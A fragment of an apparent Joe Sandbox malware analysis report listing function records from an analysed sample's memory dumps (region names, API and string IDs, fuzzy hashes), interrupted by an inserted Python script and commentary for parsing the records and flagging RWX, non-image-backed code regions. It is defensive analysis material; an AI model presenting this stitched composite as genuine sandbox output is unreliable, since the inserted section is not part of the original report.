                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                                • Opcode ID: 34f41f65ebeee98072c04c36ffcb08d764f10b3598a8f5a66480d6cdd8a7e9c2
                                                                                                                                                                                                                                                • Instruction ID: a73d6da13a4f776946359a1131cded815efbbf00880d5c852d1789b80240eaac
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34f41f65ebeee98072c04c36ffcb08d764f10b3598a8f5a66480d6cdd8a7e9c2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4751E33A3196808EDB58CF15E448B2C339BF356B99F98C121DA5647788DB3BEC61C701
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                                                                • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                • Opcode ID: 8ebe29515744ec85b4c7a5c69406529571aeda380531785c74bea0d93e5ddae6
                                                                                                                                                                                                                                                • Instruction ID: d3ffc81e7c9eb2d0887fe4fad70bfba91deec3aacd10c34b4f5a7622146221e6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ebe29515744ec85b4c7a5c69406529571aeda380531785c74bea0d93e5ddae6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D061F636504BC49AEB349F15E48439EB7A5F786788F088215EB9903B59CB3DD5A4CB00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599175099.000002616F300000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002616F300000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f300000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                • String ID: csm$csm
                                                                                                                                                                                                                                                • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                • Opcode ID: 54601b73b573f90b6a3621b815e414a07fc66bdc2a6778d7d0011f6600b73964
                                                                                                                                                                                                                                                • Instruction ID: a47512c3927ec5e9f2943836f4348a17992453ff50a442f8eb514fcf2c3677e8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54601b73b573f90b6a3621b815e414a07fc66bdc2a6778d7d0011f6600b73964
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 92516D3A204284CEEF64CF15E44875977AAF354B94F1C8217DA9987BD5CB3AE8B1C702
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                • String ID: csm$csm
                                                                                                                                                                                                                                                • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                • Opcode ID: 54601b73b573f90b6a3621b815e414a07fc66bdc2a6778d7d0011f6600b73964
                                                                                                                                                                                                                                                • Instruction ID: 42ac01cb531c62916f6067e3dc724ddba295e35a24648d9a8f779a66a45ab108
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54601b73b573f90b6a3621b815e414a07fc66bdc2a6778d7d0011f6600b73964
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA51A07A5006C09EFB68AF16D44835877AAF356B84F1CC115DA8887BD6DB3AEA70C701
                                                                                                                                                                                                                                                APIs
Memory Dump Source
• Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
• Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID:
• API String ID: 756756679-0
APIs
Memory Dump Source
• Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
• Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
Similarity
• API ID: FileWrite$ConsoleErrorLastOutput
• String ID:
• API String ID: 2718003287-0
APIs
Memory Dump Source
• Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
• Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
Similarity
• API ID: ConsoleErrorLastMode
• String ID:
• API String ID: 953036326-0
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
• Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
Similarity
• API ID: FileType
• String ID: \\.\pipe\
• API String ID: 3081899298-91387939
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.1599175099.000002616F300000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002616F300000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2616f300000_r8k29DBraE.jbxd
Similarity
• API ID: CurrentImageNonwritable__except_validate_context_record
• String ID: csm
• API String ID: 3242871069-1018135373
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.1599175099.000002616F300000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002616F300000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2616f300000_r8k29DBraE.jbxd
Similarity
• API ID: CallTranslator
• String ID: MOC$RCC
• API String ID: 3163161869-2084237596
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
• Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
Similarity
• API ID: FileType
• String ID: \\.\pipe\
• API String ID: 3081899298-91387939
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
• Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID: U
• API String ID: 442123175-4171548499
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
• Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
Similarity
• API ID: ExceptionFileHeaderRaise
• String ID: csm
• API String ID: 2573137834-1018135373
• Opcode ID: d7810ab3a0ec9818877cf1b3e283a106e6e962497adc233d094785ed36f44b7e
• Instruction ID: c7639cc15ea8e8831390283e97a9ff838e661b2039d858bda659158deff423fc
• Opcode Fuzzy Hash: d7810ab3a0ec9818877cf1b3e283a106e6e962497adc233d094785ed36f44b7e
• Instruction Fuzzy Hash: 47116D36209B8082EB648F15F40425977E9F789B94F5C8221EF8D07768EF3DC965CB00
APIs
Memory Dump Source
• Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
• Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID:
• API String ID: 756756679-0
• Opcode ID: 1e98e18f6346a7606d876eb22bc804523d63b476fed3d5047e07684f33477b56
• Instruction ID: c87d3dd8ddabf890f4505f800cc9132724725d80eebd616b83e7e354a4ed5b97
• Opcode Fuzzy Hash: 1e98e18f6346a7606d876eb22bc804523d63b476fed3d5047e07684f33477b56
• Instruction Fuzzy Hash: 5D119839601B9489EB05DB56E40822977AAF78AFC0F1C8024DE4D43765DF35E862C300
APIs
Memory Dump Source
• Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
• Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
Similarity
• API ID: Heap$AllocProcess
• String ID:
• API String ID: 1617791916-0
• Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
• Instruction ID: e91848b8311e3cd457e28bde7e57ffb65e00dc88e7dd92c0b69f86ed6eeea488
• Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
• Instruction Fuzzy Hash: 42E06D3D6017048AEB058F66D80C34A3AE6FB8AF06F08C024CD0907351DF7E98BAC750
Strings
Memory Dump Source
• Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
Similarity
• API ID:
• String ID: 6$6$"r
• API String ID: 0-987654822
• Opcode ID: e765f713194e6d78a1db2c0cfc7cd3094b2ff5bf065d814df658bbe2717206e8
• Instruction ID: e9a18d02c87f839e50d9fa8e3d70ee71ca76f7c05f88bb5a57cbee890d6383a4
• Opcode Fuzzy Hash: e765f713194e6d78a1db2c0cfc7cd3094b2ff5bf065d814df658bbe2717206e8
• Instruction Fuzzy Hash: 2C510861A4DA8A8FE794EB3C8459675BBD1FF59200F0581FAE08EC31A3DE199C44C781
Memory Dump Source
• Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: aec73483d2e1c77995a38812f798a6de55e3f93655864619fa47f6dab57ec817
• Instruction ID: dd05b2e32c1295295e55e8c97d9c62b623ead45cd6345d81fb15595f69a49f43
• Opcode Fuzzy Hash: aec73483d2e1c77995a38812f798a6de55e3f93655864619fa47f6dab57ec817
• Instruction Fuzzy Hash: B0F19570909A8E8FEBA8DF28C8557E937E1FF55310F04826EE84DC7291DB39D9458B81
Memory Dump Source
• Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 74ec47f98f32fe86d967b723ca3ead349879042e54cfad5e68990f8b45ca8ea8
• Instruction ID: c021c8792db43e293f808ec740979d33607b074572601093f231adbb7999e623
• Opcode Fuzzy Hash: 74ec47f98f32fe86d967b723ca3ead349879042e54cfad5e68990f8b45ca8ea8
• Instruction Fuzzy Hash: F9E1C570909A4E8FEB68DF28C8557E977E1FF55310F04826AE84EC7291CE79D9448BC2
Strings
Memory Dump Source
• Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
Similarity
• API ID:
• String ID: 0D$0D$0D$/$/
• API String ID: 0-87410978
• Opcode ID: d94d01c1b8aaa30acb27b1ccbb058575024479f24d5b30860e57a2700e3f6aab
• Instruction ID: 2bf400d4632bcbb36ecf9c85a39a225ee22bb5aa57757b2c5da937300bcc420b
• Opcode Fuzzy Hash: d94d01c1b8aaa30acb27b1ccbb058575024479f24d5b30860e57a2700e3f6aab
• Instruction Fuzzy Hash: A3913462E58A4A4FF758E738C855AF96BD5EF95350B0045FAE00EC72D3DD2DA90A83C0
Strings
Memory Dump Source
• Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
Similarity
• API ID:
• String ID: 0"$HB$r6
• API String ID: 0-2729165795
• Opcode ID: 8676201667af84c4f023d89b5074c671f0f8976e8547dead0d7cb1fcd03e285d
• Instruction ID: abebe9749ee3c3f01fd26549306df4035f2757fee913d008fdbd9eaa65da44bb
• Opcode Fuzzy Hash: 8676201667af84c4f023d89b5074c671f0f8976e8547dead0d7cb1fcd03e285d
• Instruction Fuzzy Hash: 16814762E1DA4A8FF759D73C84596B86BD5EF99340F0445BAE04EC32D3DE289C0A87C1
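The function records above follow one fixed layout: a memory-dump source (the .sdmp region the function was disassembled from, with its offset and whether it is backed by a PE image), the IDA snapshot, and the Similarity block with API/String IDs and opcode/instruction fuzzy hashes. The following is an added example, not part of the Joe Sandbox report or its tooling: it parses that layout into records, decodes the .sdmp name, and flags the regions an analyst would look at first (RWX memory that is not backed by a PE image, which is what injected or unpacked code looks like in a dump). Assumptions, also marked in the code: the fourth dotted field of the .sdmp name is the region base (it equals the printed Offset, which the code checks) and the fifth is the Win32 page-protection constant (0x40 = PAGE_EXECUTE_READWRITE); the remaining fields are kept undecoded. The two sample entries are copied from this page; the "Download File" link label that the report HTML appends to Associated entries is kept in the sample so the parser shows it being stripped.

```python
"""Parse a Joe Sandbox report's per-function 'Memory Dump Source'/'Similarity'
records. Added example, not Joe Sandbox code. Assumption: dotted field 4 of the
.sdmp name is the region base (it equals the printed Offset, which is checked)
and field 5 is the Win32 page protection (0x40 = PAGE_EXECUTE_READWRITE)."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

PAGE_EXECUTE_READWRITE = 0x40

# Constructed input: two entries copied from this report in the flattened
# "Label: value" layout of the extracted page ("Download File" residue kept).
SAMPLE = """\
Memory Dump Source
• Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
• Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
Similarity
• API ID: ExceptionFileHeaderRaise
• String ID: csm
• API String ID: 2573137834-1018135373
• Opcode ID: d7810ab3a0ec9818877cf1b3e283a106e6e962497adc233d094785ed36f44b7e
• Instruction ID: c7639cc15ea8e8831390283e97a9ff838e661b2039d858bda659158deff423fc
• Opcode Fuzzy Hash: d7810ab3a0ec9818877cf1b3e283a106e6e962497adc233d094785ed36f44b7e
• Instruction Fuzzy Hash: 47116D36209B8082EB648F15F40425977E9F789B94F5C8221EF8D07768EF3DC965CB00
Strings
Memory Dump Source
• Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
Similarity
• API ID:
• String ID: 6$6$"r
• API String ID: 0-987654822
• Opcode ID: e765f713194e6d78a1db2c0cfc7cd3094b2ff5bf065d814df658bbe2717206e8
• Instruction ID: e9a18d02c87f839e50d9fa8e3d70ee71ca76f7c05f88bb5a57cbee890d6383a4
• Opcode Fuzzy Hash: e765f713194e6d78a1db2c0cfc7cd3094b2ff5bf065d814df658bbe2717206e8
• Instruction Fuzzy Hash: 2C510861A4DA8A8FE794EB3C8459675BBD1FF59200F0581FAE08EC31A3DE199C44C781
"""
SOURCE_RE = re.compile(r"Source File:\s*(\S+?\.sdmp),\s*Offset:\s*([0-9A-Fa-f]+),"
                       r"\s*based on PE:\s*(true|false)")
KV_RE = re.compile(r"^([A-Za-z][A-Za-z ]*?):\s*(.*)$")  # "Label: value" lines


@dataclass
class Region:
    name: str
    proc_index: int   # dotted field 1
    base: int         # dotted field 4 (assumed region base)
    protect: int      # dotted field 5 (assumed Win32 page protection)
    raw: List[str]    # all eight fields, for the ones not decoded here


@dataclass
class FunctionRecord:
    source: Optional[Region] = None
    offset: Optional[int] = None
    based_on_pe: Optional[bool] = None
    associated: List[Region] = field(default_factory=list)
    ids: Dict[str, str] = field(default_factory=dict)  # Snapshot File + Similarity fields


def parse_sdmp_name(name: str) -> Region:
    """Split '<8 hex fields>.sdmp'; strip the 'Download File' link residue first."""
    name = re.sub(r"Download File$", "", name.strip())
    m = re.fullmatch(r"((?:[0-9A-Fa-f]+\.){8})sdmp", name)
    if not m:
        raise ValueError(f"unexpected sdmp name: {name}")
    f = m.group(1).rstrip(".").split(".")
    return Region(name, int(f[0], 16), int(f[3], 16), int(f[4], 16), f)


def parse_records(text: str) -> List[FunctionRecord]:
    """One record per 'Memory Dump Source' heading; bare section labels
    (APIs, Strings, Similarity, Joe Sandbox IDA Plugin) carry no data."""
    records: List[FunctionRecord] = []
    cur: Optional[FunctionRecord] = None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if line == "Memory Dump Source":
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None or not line:
            continue
        m = SOURCE_RE.match(line)
        kv = KV_RE.match(line)
        if m:
            cur.source = parse_sdmp_name(m.group(1))
            cur.offset = int(m.group(2), 16)
            cur.based_on_pe = m.group(3) == "true"
        elif kv and kv.group(1) == "Associated":
            cur.associated.append(parse_sdmp_name(kv.group(2)))
        elif kv:
            cur.ids[kv.group(1)] = kv.group(2)
    return records


def triage(records: List[FunctionRecord]) -> List[Tuple[int, int, List[str]]]:
    """(proc_index, base, tags) per record: RWX regions, code that is not backed
    by a PE image, and internal inconsistencies worth a second look."""
    out = []
    for r in records:
        if r.source is None:
            continue
        tags = []
        if r.offset != r.source.base:
            tags.append("offset/base mismatch")
        if r.source.protect == PAGE_EXECUTE_READWRITE:
            tags.append("RWX region")
            if r.based_on_pe is False:
                tags.append("code in non-image memory")
        if r.ids.get("Opcode Fuzzy Hash") != r.ids.get("Opcode ID"):
            tags.append("opcode hash != opcode id")
        out.append((r.source.proc_index, r.source.base, tags))
    return out
```

On the two sample entries, triage() separates the function that sits in process 1's RWX region at 0x2616F590000, which the report marks as based on a PE (an unpacked image in the sample's own process), from the one at 0x7FFAAC590000 in process 3 (the wzcsapi snapshot), which is RWX and not PE-backed. The Instruction Fuzzy Hash values collected in ids are the ones to carry into a similarity index across reports.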
Strings
Memory Dump Source
• Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
Similarity
• API ID:
• String ID: 0"$HB$r6
• API String ID: 0-2729165795
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: r6
                                                                                                                                                                                                                                                • API String ID: 0-2984296541
                                                                                                                                                                                                                                                • Opcode ID: a1abe6e60f99226ea6584c662e9206b1c036f9f021a2f0b73dce4230beffeddc
                                                                                                                                                                                                                                                • Instruction ID: b98e86ff549d872347101cc652f99bd076daf52c8aae5baadd9b8bbc87f9428e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a1abe6e60f99226ea6584c662e9206b1c036f9f021a2f0b73dce4230beffeddc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3231B561B1C9490FEB98EB3CD85A679B7C6EB99311F0445BEE04EC36D3DD289C418381
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 6
                                                                                                                                                                                                                                                • API String ID: 0-1452363761
                                                                                                                                                                                                                                                • Opcode ID: 0a74ddab92180e8c3fad88507ede3872d45205110adf705f2bb9dd5d352138bb
                                                                                                                                                                                                                                                • Instruction ID: 9878985c8790b0773e2ae72c752296d94bdf895a26ea13987f7110ccb595e9b6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0a74ddab92180e8c3fad88507ede3872d45205110adf705f2bb9dd5d352138bb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5531D461A1890A8FFB44BBBC886A7BD77D5EF98300F0481BAE40DC7297DD2C98458791
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: HB
                                                                                                                                                                                                                                                • API String ID: 0-408134297
                                                                                                                                                                                                                                                • Opcode ID: 7aa500bf5e62c3a511cd7cec5d74199bddea2011369c6c0e0219858edab618ac
                                                                                                                                                                                                                                                • Instruction ID: 486a8decd6f5926c5f8f5567aab0e202846d8f39d24af10f1c6bbbd6a0db3781
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7aa500bf5e62c3a511cd7cec5d74199bddea2011369c6c0e0219858edab618ac
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D241E471918A4A9FEB44EB78C851AF97BE1FF89300F508475D00DC32D2CE28A945CB80
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 6
                                                                                                                                                                                                                                                • API String ID: 0-1452363761
                                                                                                                                                                                                                                                • Opcode ID: 836385f5caae787aa715e275af0b0d48254e9c1553ee9f8cace78caac3959a05
                                                                                                                                                                                                                                                • Instruction ID: 269598744b8fe1c9c7a9abf7c62b34b544fcdb44b1d37fbdc039b154bfe14a72
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 836385f5caae787aa715e275af0b0d48254e9c1553ee9f8cace78caac3959a05
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F731A761B1890A4BEB84BBBC885A7BD76D6EF9C301F5041B9E40DC3297DD289C458791
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: d
                                                                                                                                                                                                                                                • API String ID: 0-2564639436
                                                                                                                                                                                                                                                • Opcode ID: 7c2a9d63e0efa2a27d0d5a0965b7c17fcdcd8ba71824d433b305cef32214cccc
                                                                                                                                                                                                                                                • Instruction ID: f22365d119d3d44549171b512da85a382ceae081b67176a0b9aeee02ed3aca17
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c2a9d63e0efa2a27d0d5a0965b7c17fcdcd8ba71824d433b305cef32214cccc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6521D532C4E25B8FFB409BA4C8556EDBBE4EF47310F0541BAE48DD3192DA2E944987D2
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: d
                                                                                                                                                                                                                                                • API String ID: 0-2564639436
                                                                                                                                                                                                                                                • Opcode ID: d2be783dda2a79105dbd6082b8619a572504a58d13c8bb459116791bef0f99b6
                                                                                                                                                                                                                                                • Instruction ID: a766e0f3650a3717e2b545ec525170f7456938bb372380998afc494804af1dad
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d2be783dda2a79105dbd6082b8619a572504a58d13c8bb459116791bef0f99b6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BA11A531D5951B8AFF54AB6884056FDB6A8EF86304F00407AE91DE2180DE2FA94486D2
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: HB
                                                                                                                                                                                                                                                • API String ID: 0-408134297
                                                                                                                                                                                                                                                • Opcode ID: ac22f9b7059042a5afff9c1066a4994699ebc20a8da9cc816db2e4358a3e7455
                                                                                                                                                                                                                                                • Instruction ID: be873666e8129c8dc12ff044aa3e4e8973de131a0bcca4d930ec8d1ef241844c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ac22f9b7059042a5afff9c1066a4994699ebc20a8da9cc816db2e4358a3e7455
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9501C051E8E687CFF766637CC4662692A99EF67304F0084FAE04D822C3DD1DA80A8381
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.2679796016.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_7ffaac590000_wzcsapi.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 6
                                                                                                                                                                                                                                                • API String ID: 0-1452363761
                                                                                                                                                                                                                                                • Opcode ID: 6e553e47e870b42a757cb55e513459a4906b23a8f78636867ebca816f799a9de
                                                                                                                                                                                                                                                • Instruction ID: bc990022c209be84a4168d6acf4497006e48c2fa956539c8f1dea3638ffedf71
• Opcode Fuzzy Hash: 6e553e47e870b42a757cb55e513459a4906b23a8f78636867ebca816f799a9de
